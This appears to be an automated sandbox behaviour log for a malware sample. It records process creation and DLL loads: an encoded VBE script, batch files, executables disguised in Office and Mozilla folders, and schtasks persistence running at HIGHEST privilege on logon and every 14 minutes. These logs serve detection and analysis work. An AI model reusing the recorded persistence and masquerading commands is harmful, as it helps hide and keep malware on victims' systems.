Source: C:\hyperIntoBroker\hyperProviderbrokermonitorNet.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "hyperProviderbrokermonitorNet" /sc ONLOGON /tr "'C:\hyperIntoBroker\hyperProviderbrokermonitorNet.exe'" /rl HIGHEST /f
Source: C:\hyperIntoBroker\hyperProviderbrokermonitorNet.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "hyperProviderbrokermonitorNeth" /sc MINUTE /mo 14 /tr "'C:\hyperIntoBroker\hyperProviderbrokermonitorNet.exe'" /rl HIGHEST /f
Source: C:\hyperIntoBroker\hyperProviderbrokermonitorNet.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\JWcAfTbAe8.bat"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
Source: unknown	Process created: C:\hyperIntoBroker\hyperProviderbrokermonitorNet.exe C:\hyperIntoBroker\hyperProviderbrokermonitorNet.exe
Source: unknown	Process created: C:\hyperIntoBroker\hyperProviderbrokermonitorNet.exe C:\hyperIntoBroker\hyperProviderbrokermonitorNet.exe
Source: unknown	Process created: C:\Users\user\PuhmblZdAcSNmlRDfzjrgW.exe C:\Users\user\PuhmblZdAcSNmlRDfzjrgW.exe
Source: C:\Program Files (x86)\Microsoft Office\Office16\PuhmblZdAcSNmlRDfzjrgW.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c "C:\Program Files (x86)\microsoft office\Office16\PuhmblZdAcSNmlRDfzjrgW.exe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Program Files (x86)\Microsoft Office\Office16\PuhmblZdAcSNmlRDfzjrgW.exe "C:\Program Files (x86)\microsoft office\Office16\PuhmblZdAcSNmlRDfzjrgW.exe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Program Files (x86)\Mozilla Maintenance Service\logs\WmiPrvSE.exe "C:\Program Files (x86)\mozilla maintenance service\logs\WmiPrvSE.exe"
Source: C:\Users\user\Desktop\DC86.exe	Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\hyperIntoBroker\vN1MMUTrCtC1FtSWQe4vLUvQugg9bTGuni3V.vbe"	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\hyperIntoBroker\7ZVJJhRLWkC.bat" "	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\hyperIntoBroker\hyperProviderbrokermonitorNet.exe "C:\hyperIntoBroker/hyperProviderbrokermonitorNet.exe"	Jump to behavior
Source: C:\hyperIntoBroker\hyperProviderbrokermonitorNet.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\gvn4blmg\gvn4blmg.cmdline"	Jump to behavior
Source: C:\hyperIntoBroker\hyperProviderbrokermonitorNet.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\obippivd\obippivd.cmdline"	Jump to behavior
Source: C:\hyperIntoBroker\hyperProviderbrokermonitorNet.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\JWcAfTbAe8.bat"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES3377.tmp" "c:\Program Files (x86)\Microsoft\Edge\Application\CSC54DAB3F1F89841D48E3F80BA35A395CE.TMP"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES355B.tmp" "c:\Windows\System32\CSCBF0D9C89CA2D49349EF95B69138A8B32.TMP"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Program Files (x86)\Mozilla Maintenance Service\logs\WmiPrvSE.exe "C:\Program Files (x86)\mozilla maintenance service\logs\WmiPrvSE.exe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Program Files (x86)\Microsoft Office\Office16\PuhmblZdAcSNmlRDfzjrgW.exe "C:\Program Files (x86)\microsoft office\Office16\PuhmblZdAcSNmlRDfzjrgW.exe"

Source: C:\Users\user\Desktop\DC86.exe	Section loaded: <pi-ms-win-core-synch-l1-2-0.dll	Jump to behavior
Source: C:\Users\user\Desktop\DC86.exe	Section loaded: <pi-ms-win-core-fibers-l1-1-1.dll	Jump to behavior
Source: C:\Users\user\Desktop\DC86.exe	Section loaded: <pi-ms-win-core-synch-l1-2-0.dll	Jump to behavior
Source: C:\Users\user\Desktop\DC86.exe	Section loaded: <pi-ms-win-core-fibers-l1-1-1.dll	Jump to behavior
Source: C:\Users\user\Desktop\DC86.exe	Section loaded: <pi-ms-win-core-localization-l1-2-1.dll	Jump to behavior
Source: C:\Users\user\Desktop\DC86.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\DC86.exe	Section loaded: dxgidebug.dll	Jump to behavior
Source: C:\Users\user\Desktop\DC86.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Users\user\Desktop\DC86.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\DC86.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\DC86.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\DC86.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\DC86.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\DC86.exe	Section loaded: riched20.dll	Jump to behavior
Source: C:\Users\user\Desktop\DC86.exe	Section loaded: usp10.dll	Jump to behavior
Source: C:\Users\user\Desktop\DC86.exe	Section loaded: msls31.dll	Jump to behavior
Source: C:\Users\user\Desktop\DC86.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\DC86.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\Desktop\DC86.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\Desktop\DC86.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\Desktop\DC86.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\Desktop\DC86.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\DC86.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\DC86.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\DC86.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\DC86.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\DC86.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\DC86.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\DC86.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\DC86.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\DC86.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\DC86.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\DC86.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\DC86.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\DC86.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\DC86.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\DC86.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Users\user\Desktop\DC86.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Users\user\Desktop\DC86.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\DC86.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\DC86.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\DC86.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\DC86.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\DC86.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\DC86.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\DC86.exe	Section loaded: pcacli.dll	Jump to behavior
Source: C:\Users\user\Desktop\DC86.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: vbscript.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: scrobj.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: scrrun.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: dlnashext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: wpdshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: cmdext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\hyperIntoBroker\hyperProviderbrokermonitorNet.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\hyperIntoBroker\hyperProviderbrokermonitorNet.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\hyperIntoBroker\hyperProviderbrokermonitorNet.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\hyperIntoBroker\hyperProviderbrokermonitorNet.exe	Section loaded: version.dll	Jump to behavior
Source: C:\hyperIntoBroker\hyperProviderbrokermonitorNet.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\hyperIntoBroker\hyperProviderbrokermonitorNet.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\hyperIntoBroker\hyperProviderbrokermonitorNet.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\hyperIntoBroker\hyperProviderbrokermonitorNet.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\hyperIntoBroker\hyperProviderbrokermonitorNet.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\hyperIntoBroker\hyperProviderbrokermonitorNet.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\hyperIntoBroker\hyperProviderbrokermonitorNet.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\hyperIntoBroker\hyperProviderbrokermonitorNet.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\hyperIntoBroker\hyperProviderbrokermonitorNet.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\hyperIntoBroker\hyperProviderbrokermonitorNet.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\hyperIntoBroker\hyperProviderbrokermonitorNet.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\hyperIntoBroker\hyperProviderbrokermonitorNet.exe	Section loaded: ktmw32.dll	Jump to behavior
Source: C:\hyperIntoBroker\hyperProviderbrokermonitorNet.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\hyperIntoBroker\hyperProviderbrokermonitorNet.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\hyperIntoBroker\hyperProviderbrokermonitorNet.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\hyperIntoBroker\hyperProviderbrokermonitorNet.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\hyperIntoBroker\hyperProviderbrokermonitorNet.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\hyperIntoBroker\hyperProviderbrokermonitorNet.exe	Section loaded: dlnashext.dll	Jump to behavior
Source: C:\hyperIntoBroker\hyperProviderbrokermonitorNet.exe	Section loaded: wpdshext.dll	Jump to behavior
Source: C:\hyperIntoBroker\hyperProviderbrokermonitorNet.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\hyperIntoBroker\hyperProviderbrokermonitorNet.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\hyperIntoBroker\hyperProviderbrokermonitorNet.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\hyperIntoBroker\hyperProviderbrokermonitorNet.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\hyperIntoBroker\hyperProviderbrokermonitorNet.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\hyperIntoBroker\hyperProviderbrokermonitorNet.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\hyperIntoBroker\hyperProviderbrokermonitorNet.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\hyperIntoBroker\hyperProviderbrokermonitorNet.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\hyperIntoBroker\hyperProviderbrokermonitorNet.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\hyperIntoBroker\hyperProviderbrokermonitorNet.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\hyperIntoBroker\hyperProviderbrokermonitorNet.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\hyperIntoBroker\hyperProviderbrokermonitorNet.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\hyperIntoBroker\hyperProviderbrokermonitorNet.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\PuhmblZdAcSNmlRDfzjrgW.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\PuhmblZdAcSNmlRDfzjrgW.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\PuhmblZdAcSNmlRDfzjrgW.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\PuhmblZdAcSNmlRDfzjrgW.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\PuhmblZdAcSNmlRDfzjrgW.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\PuhmblZdAcSNmlRDfzjrgW.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\PuhmblZdAcSNmlRDfzjrgW.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\PuhmblZdAcSNmlRDfzjrgW.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\PuhmblZdAcSNmlRDfzjrgW.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\PuhmblZdAcSNmlRDfzjrgW.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\PuhmblZdAcSNmlRDfzjrgW.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\PuhmblZdAcSNmlRDfzjrgW.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\PuhmblZdAcSNmlRDfzjrgW.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\PuhmblZdAcSNmlRDfzjrgW.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\PuhmblZdAcSNmlRDfzjrgW.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\PuhmblZdAcSNmlRDfzjrgW.exe	Section loaded: ktmw32.dll	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\PuhmblZdAcSNmlRDfzjrgW.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\PuhmblZdAcSNmlRDfzjrgW.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\PuhmblZdAcSNmlRDfzjrgW.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\PuhmblZdAcSNmlRDfzjrgW.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\PuhmblZdAcSNmlRDfzjrgW.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\PuhmblZdAcSNmlRDfzjrgW.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\PuhmblZdAcSNmlRDfzjrgW.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\PuhmblZdAcSNmlRDfzjrgW.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\PuhmblZdAcSNmlRDfzjrgW.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\PuhmblZdAcSNmlRDfzjrgW.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\PuhmblZdAcSNmlRDfzjrgW.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\PuhmblZdAcSNmlRDfzjrgW.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\PuhmblZdAcSNmlRDfzjrgW.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\PuhmblZdAcSNmlRDfzjrgW.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\PuhmblZdAcSNmlRDfzjrgW.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\PuhmblZdAcSNmlRDfzjrgW.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\PuhmblZdAcSNmlRDfzjrgW.exe	Section loaded: pcacli.dll	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\PuhmblZdAcSNmlRDfzjrgW.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll
